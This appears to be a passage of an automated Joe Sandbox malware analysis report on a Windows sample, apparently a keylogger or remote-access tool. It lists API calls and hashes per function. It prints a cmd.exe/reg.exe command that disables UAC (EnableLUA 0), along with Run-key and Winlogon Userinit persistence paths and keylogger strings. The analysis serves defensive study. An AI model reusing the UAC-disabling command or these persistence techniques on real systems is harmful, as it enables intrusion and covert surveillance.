                                                • Instruction Fuzzy Hash: D811A372A002186BCB00FFA5DC5ACEF376CBA45345B00457EF902E71D1EA789A4887AD
                                                Function 00412442 Relevance: 10.6, APIs: 7, Instructions: 55windowstringCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041245C
                                                  • Part of subcall function 004124FB: RegisterClassExA.USER32(00000030), ref: 00412541
                                                  • Part of subcall function 004124FB: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041255C
                                                  • Part of subcall function 004124FB: GetLastError.KERNEL32(?,00000000), ref: 00412566
                                                • ExtractIconA.SHELL32(00000000,?,00000000), ref: 00412493
                                                • lstrcpynA.KERNEL32(00419F58,00000040), ref: 004124AB
                                                • Shell_NotifyIconA.SHELL32(00000000,00419F40), ref: 004124C1
                                                • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 004124D4
                                                • TranslateMessage.USER32(?), ref: 004124DE
                                                • DispatchMessageA.USER32(?), ref: 004124E8
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                                • String ID:
                                                • API String ID: 1970332568-0
                                                • Opcode ID: 2fd268903669e1d90c72dd924620844bddff3956caf8f088ad50424f37764ba7
                                                • Instruction ID: 945de9d12dbaddab0209f70888868605a33d26d39a197056befd316b5a8ef4ad
                                                • Opcode Fuzzy Hash: 2fd268903669e1d90c72dd924620844bddff3956caf8f088ad50424f37764ba7
                                                • Instruction Fuzzy Hash: 9B115EB2801118BBD7109F95ED08EDB3BACFB49711F008125F609E2050D7B89A46CBAC
                                                Function 0040E01C Relevance: 10.6, APIs: 7, Instructions: 54sleepCOMMON
                                                Download Yara Rule
                                                APIs
                                                • Sleep.KERNEL32(00000064), ref: 0040E028
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000001), ref: 0040E04B
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,00000000), ref: 0040E05D
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040E078
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 0040E081
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040E098
                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040E0B3
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: U?$char_traits@V?$allocator@$G@2@@std@@G@std@@$?c_str@?$basic_string@$??0?$basic_string@D@2@@std@@D@std@@V01@@$??1?$basic_string@Sleep
                                                • String ID:
                                                • API String ID: 3281088245-0
                                                • Opcode ID: 2b5c3d421aa743e0b0dee230638f2a2e513bff52e28b37d4c6d808fce09c79a0
                                                • Instruction ID: 7deddea6f96e0ed7fbd893dd57507630e2d8b370f4cd2ffef670f1e4ca3dce7f
                                                • Opcode Fuzzy Hash: 2b5c3d421aa743e0b0dee230638f2a2e513bff52e28b37d4c6d808fce09c79a0
                                                • Instruction Fuzzy Hash: 03114FB19011546FDB04FBA1ED5A9EE3739AB40305F0048BAF902A61E2EE755A448B59
                                                Function 004050A8 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 53COMMON
                                                Download Yara Rule
                                                APIs
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Offline Keylogger Stopped,?,75920F00,?,?,00404852), ref: 004050D1
                                                  • Part of subcall function 0040512C: GetLocalTime.KERNEL32(?,00419830), ref: 0040513C
                                                  • Part of subcall function 0040512C: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,{ %04i/%02i/%02i %02i:%02i:%02i - ,?,! },?,?,?,?,?,6E@), ref: 00405172
                                                  • Part of subcall function 0040512C: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,6E@), ref: 0040517F
                                                  • Part of subcall function 0040512C: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,6E@), ref: 00405189
                                                  • Part of subcall function 0040512C: sprintf.MSVCRT ref: 00405197
                                                  • Part of subcall function 0040512C: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004051A3
                                                  • Part of subcall function 0040512C: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004051AC
                                                  • Part of subcall function 0040512C: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(?), ref: 004051C2
                                                  • Part of subcall function 0040512C: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004051DF
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Offline Keylogger Stopped,?,75920F00,?,?,00404852), ref: 004050E8
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?), ref: 004050FC
                                                • UnhookWindowsHookEx.USER32(00000000), ref: 00405119
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??0?$basic_string@??1?$basic_string@D@1@@$D@2@@0@Hstd@@V?$basic_string@$?c_str@?$basic_string@HookLocalTimeUnhookV01@V10@V10@@WindowsY?$basic_string@sprintf
                                                • String ID: Offline Keylogger Stopped$[INFO]
                                                • API String ID: 2687675415-1731565019
                                                • Opcode ID: 73f78bc0082c565f9f55cf76f0ab7305f70b4147b17319cc33d2a08416430c4d
                                                • Instruction ID: 0394ba6366e7d4e37fefac95e8612def35b743fed88684bbc0dd45c3d2f07594
                                                • Opcode Fuzzy Hash: 73f78bc0082c565f9f55cf76f0ab7305f70b4147b17319cc33d2a08416430c4d
                                                • Instruction Fuzzy Hash: DD01F571A001443FEB11BFA99C858BF3BACE64135174044BEE44197241D6795E498BAA
                                                Function 0040D7AF Relevance: 10.6, APIs: 7, Instructions: 50COMMON
                                                Download Yara Rule
                                                APIs
                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,00000000), ref: 0040D7D8
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000002), ref: 0040D7EA
                                                • atoi.MSVCRT(00000000), ref: 0040D7F7
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000001,00000000), ref: 0040D80C
                                                • atoi.MSVCRT(00000000), ref: 0040D813
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000000), ref: 0040E4F8
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00000000), ref: 0040E501
                                                  • Part of subcall function 0040207B: closesocket.WS2_32(?), ref: 00402080
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??1?$basic_string@?c_str@?$basic_string@atoi$??4?$basic_string@V01@V01@@closesocket
                                                • String ID:
                                                • API String ID: 2761558587-0
                                                • Opcode ID: 72dbe61a2f8f8e5bf15a7849a2025baa77ba4c3b2ca82f2484b6bacd3a60b3db
                                                • Instruction ID: ca0c5fb672410681becd366efb38246cee844f09783bbe814c819fee062b097f
                                                • Opcode Fuzzy Hash: 72dbe61a2f8f8e5bf15a7849a2025baa77ba4c3b2ca82f2484b6bacd3a60b3db
                                                • Instruction Fuzzy Hash: 14012D32A002159BCB08EBF2EC699EE7769EB50706B00887FE502E21E1DE785944CB59
                                                Function 0040AB16 Relevance: 10.5, APIs: 7, Instructions: 42registryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • RegCreateKeyW.ADVAPI32(?,80000002,80000002), ref: 0040AB23
                                                • ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(0041409C,?,?,004072D5,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,?,?,?,?,?,?,0041409C,00000001,00419994,00419958), ref: 0040AB32
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,004072D5,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,?,?,?,?,?,?,0041409C,00000001,00419994,00419958), ref: 0040AB40
                                                • RegSetValueExW.ADVAPI32(80000002,004072D5,00000000,?,00000000,?,?,004072D5,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,?), ref: 0040AB53
                                                • RegCloseKey.ADVAPI32(80000002,?,?,004072D5,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,?,?,?,?,?,?,0041409C,00000001,00419994,00419958), ref: 0040AB5E
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,004072D5,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,?,?,?,?,?,?,0041409C,00000001,00419994,00419958,00413888), ref: 0040AB6D
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,004072D5,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,?,?,?,?,?,?,0041409C,00000001,00419994,00419958,00413888), ref: 0040AB7C
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: G@2@@std@@G@std@@U?$char_traits@V?$allocator@$??1?$basic_string@$?c_str@?$basic_string@?length@?$basic_string@CloseCreateValue
                                                • String ID:
                                                • API String ID: 1037601705-0
                                                • Opcode ID: 434c32b60e09957411ef26353496471f8e07c9e0fd0be910f339f7ab56cc383c
                                                • Instruction ID: 7f12cbcc53fecbe87d582b8cc48c6b5378bff81d8574d99b9208886ff72aae9c
                                                • Opcode Fuzzy Hash: 434c32b60e09957411ef26353496471f8e07c9e0fd0be910f339f7ab56cc383c
                                                • Instruction Fuzzy Hash: 0201A872000119AFCF00AFA0EC598EA7B69FB1835AB018165F91A96160D7359F64DB55
                                                Function 00404FB8 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42synchronizationCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00404621), ref: 00404FC3
                                                • ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,00413670), ref: 00404FDC
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00404FEE
                                                  • Part of subcall function 00402049: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,[INFO],?,0040C2A1,0000004B), ref: 00402058
                                                  • Part of subcall function 00402049: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040206E
                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00413670,0000005A), ref: 00405003
                                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0040500E
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: D@std@@U?$char_traits@V?$allocator@$D@2@@std@@$??0?$basic_string@V01@@$??1?$basic_string@??4?$basic_string@??9std@@CreateD@2@@0@EventObjectSingleV01@V?$basic_string@Wait
                                                • String ID: p6A
                                                • API String ID: 2456067102-595022129
                                                • Opcode ID: 17f7f98f067e6dbc6960eb531d6f009f7b8488f1764a000bca18528244f77221
                                                • Instruction ID: 74794d95b6585517a20fa3f1f7dd6fcc89cca062171a37011fea34d96d489a2e
                                                • Opcode Fuzzy Hash: 17f7f98f067e6dbc6960eb531d6f009f7b8488f1764a000bca18528244f77221
                                                • Instruction Fuzzy Hash: 8DF0FCB55006007BD7201F34DD4CAA77B9DEB81722F40593EF412925D1CB34AD448B78
                                                Function 0040AA65 Relevance: 10.5, APIs: 7, Instructions: 41registryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • RegCreateKeyA.ADVAPI32(?,?,?), ref: 0040AA72
                                                • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(80000002,00419980,?,00407BCA,80000002,Software\Microsoft\Windows NT\CurrentVersion\Winlogon\,Userinit), ref: 0040AA81
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,00407BCA,80000002,Software\Microsoft\Windows NT\CurrentVersion\Winlogon\,Userinit), ref: 0040AA8B
                                                • RegSetValueExA.ADVAPI32(?,00000000,00000000,?,00000000,?,00407BCA,80000002,Software\Microsoft\Windows NT\CurrentVersion\Winlogon\,Userinit), ref: 0040AA9E
                                                • RegCloseKey.ADVAPI32(?,?,00407BCA,80000002,Software\Microsoft\Windows NT\CurrentVersion\Winlogon\,Userinit), ref: 0040AAA9
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,00407BCA,80000002,Software\Microsoft\Windows NT\CurrentVersion\Winlogon\,Userinit), ref: 0040AAB8
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,00407BCA,80000002,Software\Microsoft\Windows NT\CurrentVersion\Winlogon\,Userinit), ref: 0040AAC7
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??1?$basic_string@$?c_str@?$basic_string@?size@?$basic_string@CloseCreateValue
                                                • String ID:
                                                • API String ID: 2159132150-0
                                                • Opcode ID: b6ffc8e86b8b50b45db9268ffc76aae88d6340e7751611e2df5a130597e069ae
                                                • Instruction ID: 781ef4495a37a9729a02f807254a5a90bddac7e3fa4a8a632848f32fab2f2734
                                                • Opcode Fuzzy Hash: b6ffc8e86b8b50b45db9268ffc76aae88d6340e7751611e2df5a130597e069ae
                                                • Instruction Fuzzy Hash: 13011976100109AFCF01EF90ED598EE7B6DFF187567008175F91AA21A0DB359E24DF54
                                                Function 00409619 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 39processCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,00000044,?,00419970,00419BC8), ref: 00409657
                                                • CloseHandle.KERNEL32(?), ref: 00409666
                                                • CloseHandle.KERNEL32(?), ref: 0040966B
                                                Strings
                                                • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 0040964D
                                                • D, xrefs: 0040962E
                                                • C:\Windows\System32\cmd.exe, xrefs: 00409652
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseHandle$CreateProcess
                                                • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe$D
                                                • API String ID: 2922976086-1747066916
                                                • Opcode ID: 6453cac18675bdd6e3b536317dd82f3e65e1bbe1a16b513dc0274fbf5a0cff21
                                                • Instruction ID: 7ccfb3200751489803ddb667a8eeda4a28b2d11caf851e38832d63b9906f7f84
                                                • Opcode Fuzzy Hash: 6453cac18675bdd6e3b536317dd82f3e65e1bbe1a16b513dc0274fbf5a0cff21
                                                • Instruction Fuzzy Hash: BEF0D0B2A406197EEB009AE5DC05EFFBB7DE784715F104431FA01F6160D6746D088A65
                                                Function 0040D6A1 Relevance: 10.5, APIs: 7, Instructions: 38COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 004113E6: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00419970,00419BC8,00000000,00408808,)A,00000000,0000000B), ref: 004113F2
                                                  • Part of subcall function 004113E6: ??2@YAPAXI@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00411400
                                                  • Part of subcall function 004113E6: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00411422
                                                  • Part of subcall function 004113E6: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 00411444
                                                  • Part of subcall function 004113E6: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00411458
                                                  • Part of subcall function 004113E6: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00411461
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000001), ref: 0040D6BC
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,00000000), ref: 0040D6CF
                                                • atoi.MSVCRT(00000000), ref: 0040D6D6
                                                • SetWindowTextW.USER32(00000000), ref: 0040D6DE
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040D6EA
                                                  • Part of subcall function 0040E7A5: EnumWindows.USER32(Function_0000E6BB,00000000), ref: 0040E7AC
                                                  • Part of subcall function 0040E7A5: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00419D70), ref: 0040E7BC
                                                  • Part of subcall function 0040E7A5: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00413670,00000063), ref: 0040E7D8
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000000), ref: 0040E4F8
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00000000), ref: 0040E501
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$U?$char_traits@$D@2@@std@@D@std@@$G@2@@std@@G@std@@$??1?$basic_string@$??0?$basic_string@?c_str@?$basic_string@$V01@@$??2@??4?$basic_string@?length@?$basic_string@EnumG@1@@TextV01@WindowWindowsatoi
                                                • String ID:
                                                • API String ID: 3096670553-0
                                                • Opcode ID: 04df1328cc08fcf5a03dd6e3d7102727e13d48a73906ad98c5c2d174954cf0ba
                                                • Instruction ID: 1abe3ad5738c4660e00d60db617f694418b70cb242a2617e4e7c05781d6bbe04
                                                • Opcode Fuzzy Hash: 04df1328cc08fcf5a03dd6e3d7102727e13d48a73906ad98c5c2d174954cf0ba
                                                • Instruction Fuzzy Hash: 40F0CD756001159BDB04BFB1ED5AAED7778FB50316F1084BAF102E20E1EE785A44CB58
                                                Function 004112FA Relevance: 10.5, APIs: 7, Instructions: 31COMMON
                                                Download Yara Rule
                                                APIs
                                                • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000020,?,?,?,00408107,?,?,?,?,?,?,?,00408E3E,?,?), ref: 00411309
                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@IGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,00408107,?,?,?,?,?,?,?,00408E3E,?,?), ref: 00411313
                                                • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(?,?,00408107,?,?,?,?,?,?,?,00408E3E,?,?), ref: 0041131C
                                                • ?end@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,00408107,?,?,?,?,?,?,?,00408E3E,?,?), ref: 00411326
                                                • ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,00408107,?,?,?,?,?,?,?,00408E3E,?,?), ref: 00411330
                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,00408107,?,?,?,?,?,?,?,00408E3E,?), ref: 00411346
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00408107,?,?,?,?,?,?,?,00408E3E,?,?), ref: 0041134F
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$U?$char_traits@$G@2@@std@@G@std@@$D@2@@std@@D@std@@$??0?$basic_string@?begin@?$basic_string@$??1?$basic_string@?end@?$basic_string@?length@?$basic_string@G@1@@V01@@
                                                • String ID:
                                                • API String ID: 914748455-0
                                                • Opcode ID: 27e8c6a9e77f87a7722667680bfd72997ab372b83382414f82f6f9086f836895
                                                • Instruction ID: 61c2ad325da54bd1c19b5f42aaaf2902fb0afcffc7582ee81f41c22c6bee2ec4
